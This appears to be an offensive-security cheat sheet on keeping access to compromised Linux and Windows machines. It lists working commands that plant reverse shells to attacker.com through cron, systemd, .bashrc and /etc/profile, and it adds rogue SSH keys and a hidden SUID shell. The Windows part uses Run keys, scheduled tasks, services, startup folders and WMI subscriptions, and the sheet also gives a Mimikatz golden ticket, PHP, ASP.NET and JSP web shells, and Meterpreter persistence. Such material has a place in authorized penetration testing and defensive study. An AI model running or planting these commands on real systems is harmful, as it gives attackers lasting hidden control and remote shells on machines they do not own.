Persistence
Linux Persistence
SSH Keys
# Generate SSH key
ssh-keygen -t rsa
# Add to authorized_keys
echo "PUBLIC_KEY" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# Add to user
echo "PUBLIC_KEY" >> /home/user/.ssh/authorized_keys
Cron Jobs
# Add cron job
(crontab -l ; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'") | crontab -
# System-wide cron
echo "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'" >> /etc/crontab
Systemd Service
# Create service file
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
# Enable service
systemctl enable backdoor.service
systemctl start backdoor.service
Bashrc/Profile
# Add to .bashrc
echo "bash -i >& /dev/tcp/attacker.com/4444 0>&1" >> /root/.bashrc
# Add to profile
echo "bash -i >& /dev/tcp/attacker.com/4444 0>&1" >> /etc/profile
SUID Backdoor
# Copy bash
cp /bin/bash /tmp/.hidden
chmod 4755 /tmp/.hidden
# Execute
/tmp/.hidden -p
Windows Persistence
Registry Run Keys
# Current user
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\path\to\backdoor.exe"
# Local machine
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\path\to\backdoor.exe"
# RunOnce
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Backdoor /t REG_SZ /d "C:\path\to\backdoor.exe"
Scheduled Tasks
# Create scheduled task
schtasks /create /tn "Backdoor" /tr "C:\path\to\backdoor.exe" /sc onlogon /ru System
# Run every hour
schtasks /create /tn "Backdoor" /tr "C:\path\to\backdoor.exe" /sc hourly /ru System
# PowerShell
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -Command <command>"
$trigger = New-ScheduledTaskTrigger -AtLogon
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "Backdoor" -RunLevel Highest
Services
# Create service
sc create Backdoor binpath= "C:\path\to\backdoor.exe" start= auto
sc start Backdoor
# Modify existing service
sc config <service_name> binpath= "C:\path\to\backdoor.exe"
Startup Folder
# Copy to startup
copy backdoor.exe "C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
# All users
copy backdoor.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
WMI Event Subscription
# Create event filter
$FilterArgs = @{
name='Backdoor Filter'
EventNameSpace='root\CimV2'
QueryLanguage='WQL'
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $FilterArgs
# Create consumer
$ConsumerArgs = @{
name='Backdoor Consumer'
CommandLineTemplate='C:\path\to\backdoor.exe'
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs
# Bind filter to consumer
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{
Filter=$Filter
Consumer=$Consumer
}
Golden Ticket
# Mimikatz
kerberos::golden /domain:domain.local /sid:S-1-5-21-... /rc4:NTHASH /user:Administrator /id:500 /ptt
# Export
kerberos::golden /domain:domain.local /sid:S-1-5-21-... /rc4:NTHASH /user:Administrator /id:500 /ticket:golden.kirbi
DLL Hijacking
# Find DLL load order
# Place malicious DLL in higher priority path
copy malicious.dll "C:\path\with\higher\priority\"
Web Shells
PHP Web Shell
<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
ASP.NET Web Shell
<%@ Page Language="C#" %>
<%
Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c " + Request["cmd"]).StandardOutput.ReadToEnd());
%>
JSP Web Shell
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
int i;
while((i = in.read()) != -1) {
out.print((char)i);
}
%>
Meterpreter Persistence
# Run persistence module
run persistence -X -i 60 -p 4444 -r attacker.com
# Exploit
exploit/windows/local/persistence
exploit/windows/local/registry_persistence
Useful Links
Linux Persistence
Windows Persistence
Web Shells